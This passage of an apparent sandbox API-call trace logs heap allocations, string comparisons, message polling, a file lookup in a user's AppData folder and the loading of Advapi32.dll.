(Locale=0x400, dwCmpFlags=0x1, lpString1="9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0199.116] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0199.116] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.116] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0199.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0199.116] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.117] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0199.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Go gw9icCK1.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458fa210, ftCreationTime.dwHighDateTime=0x1d4d027, ftLastAccessTime.dwLowDateTime=0x66ab0250, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x66ab0250, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x11372, dwReserved0=0x9d40039, dwReserved1=0x152c5, cFileName="Go gw9icCK1.m4a", cAlternateFileName="GOGW9I~1.M4A")) returned 0xaa5660 [0199.118] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.118] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0199.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.120] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.120] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0199.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.120] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.121] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.122] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.122] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.122] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.122] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.123] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.123] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.125] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.126] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.126] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.127] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.127] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0199.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, 